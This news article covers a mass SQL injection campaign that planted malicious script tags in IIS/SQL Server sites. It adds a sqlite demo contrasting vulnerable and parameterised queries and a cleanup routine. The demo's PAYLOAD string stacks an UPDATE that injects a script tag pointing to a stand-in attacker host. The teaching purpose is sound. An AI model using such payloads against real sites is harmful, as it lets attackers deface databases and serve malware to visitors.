| Friday August 1st 2014

Half A Million Microsoft-Powered Sites Hit With SQL Injection


A new SQL injection attack aimed at websites running on Microsoft IIS web servers has hit some 500,000 sites, including the United Nations, UK Government sites and the U.S. Department of Homeland Security. While the attack is not necessarily Microsoft’s fault, it is specific to sites built on the company’s IIS server with a SQL Server database behind it.

The automated attack takes advantage of the fact that the injected payload does not need to know anything about a particular site’s schema: one generic batch of SQL asks SQL Server’s own system catalog for every table and every text column, then updates each of them in turn, so the same payload works unchanged against any vulnerable site. The vulnerability itself, however, is the result of poor data handling by the sites’ developers, rather than a specific Microsoft flaw.

In other words, there’s no patch that’s going to fix the issue; the problem is that the developers failed to follow well-established security practices for handling database input, above all passing user input to the database as query parameters instead of pasting it straight into the SQL text.

The attack itself appends a malicious JavaScript tag to every text field in your database. Whenever a page renders one of those fields, the visitor’s browser loads an external script from the attacker’s domain, and that script then attempts to compromise the visitor’s PC.

Most of the larger sites affected have long since cleaned up and claim that the underlying problems in their code have been fixed. If, as a visitor, you don’t want to take the chance, there’s a simple way to avoid the problem: use Firefox with NoScript. Since the attack loads its script from a domain other than the page you are visiting, NoScript will stop it from running. Note that this protects visitors only; it does nothing for a site that is still injectable.

If your site has been affected you’re going to need to restore your database from a clean backup copy and start reviewing your code to make sure every query passes input to the database safely (parameterized queries, not string concatenation), otherwise you’ll just get hit again. Should you not have a clean backup of your database, hackademix.net has a workaround: rerun the attack’s own every-text-column UPDATE, changed in a couple of lines so that it strips the injected JavaScript instead of adding it. Do this only after the code has been fixed, or the next sweep of the attack simply reinfects the database.
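How the injection lands, why parameters stop it, and what the strip-the-tag cleanup looks like, as an added example that is not the original page’s code and not the attack’s actual payload: a small Python script using an in-memory sqlite database as a stand-in for SQL Server. The table, rows, script URL and payload are constructed for the demo. sqlite has no dynamic SQL, so the stand-in payload targets one known column where the real T-SQL batch walked SQL Server’s catalog; the catalog walk appears instead on the defender’s side in text_columns(), which both counts infected cells and drives the REPLACE cleanup.

```python
import sqlite3

# Constructed stand-in for the tag the attack wrote into every text column;
# the real script URLs are deliberately not reproduced here.
INJECTED_TAG = '<script src="http://attacker.invalid/evil.js"></script>'

# What an attacker would send as the article id. SQL Server concatenates with +,
# sqlite with ||, so this stand-in payload is written for sqlite.
PAYLOAD = "1; UPDATE news SET body = body || '" + INJECTED_TAG + "'"


def new_db():
    """Tiny in-memory database standing in for a site's SQL Server back end."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'Welcome', 'Hello, world');
        INSERT INTO news VALUES (2, 'Notice', 'Maintenance tonight');
    """)
    return conn


def vulnerable_lookup(conn, article_id):
    """The bug: the request parameter is pasted into the SQL text.

    SQL Server runs every statement in the batch it is handed, so the stacked
    UPDATE after the attacker's ';' executes too. sqlite3's execute() refuses
    stacked statements, so executescript() stands in for that behaviour (it
    discards result rows, which does not matter for the attack's side effect).
    """
    conn.executescript("SELECT title, body FROM news WHERE id = " + article_id)


def safe_lookup(conn, article_id):
    """The fix: a parameterised query. The whole string is bound as one value
    and never parsed as SQL, so the stacked UPDATE can never run."""
    return conn.execute(
        "SELECT title, body FROM news WHERE id = ?", (article_id,)
    ).fetchall()


def text_columns(conn):
    """Yield every (table, column) of type TEXT from the catalog: the defender's
    version of the catalog walk the attack payload performed on SQL Server."""
    for (table,) in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'"
    ).fetchall():
        for _cid, col, ctype, *_rest in conn.execute(
            f'PRAGMA table_info("{table}")'
        ).fetchall():
            if ctype.upper() == "TEXT":
                yield table, col


def count_infected(conn, tag=INJECTED_TAG):
    """Number of cells across all text columns that contain the injected tag."""
    total = 0
    for table, col in text_columns(conn):
        # Identifiers come from the catalog, not from user input; the tag is bound.
        (n,) = conn.execute(
            f'SELECT COUNT(*) FROM "{table}" WHERE instr("{col}", ?) > 0', (tag,)
        ).fetchone()
        total += n
    return total


def scrub(conn, tag=INJECTED_TAG):
    """The hackademix-style cleanup for when no clean backup exists: the same
    every-text-column UPDATE the attacker ran, but with REPLACE() stripping the
    tag. Only worthwhile once the site's code has been fixed. Returns the
    number of infected cells left afterwards."""
    for table, col in text_columns(conn):
        conn.execute(
            f'UPDATE "{table}" SET "{col}" = REPLACE("{col}", ?, ?)', (tag, "")
        )
    conn.commit()
    return count_infected(conn, tag)


if __name__ == "__main__":
    db = new_db()
    vulnerable_lookup(db, PAYLOAD)
    print("infected cells after vulnerable lookup:", count_infected(db))  # 2
    print("infected cells after scrub:", scrub(db))                        # 0
    clean = new_db()
    print("safe lookup rows for payload:", safe_lookup(clean, PAYLOAD))    # []
    print("infected cells after safe lookup:", count_infected(clean))      # 0
```

The point to take from safe_lookup() is that the fix is not escaping or filtering the input: the driver sends the SQL and the value separately, so the text after the semicolon is compared against the id column as data and matches nothing.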

If you’ve been hit by the attack, you should report it, as Bill Sisk, Microsoft’s Trustworthy Computing Response Communications Manager, suggests on his blog:

Anyone believed to have been affected can visit: http://www.microsoft.com/protect/support/default.mspx and should contact the national law enforcement agency in their country. Those in the United States can contact Customer Service and Support at no charge using the PC Safety hotline at 1-866-PCSAFETY. Additionally, customers in the United States should contact their local FBI office or report their situation at: www.ic3.gov.

So far there have been no details about who is behind the attacks.
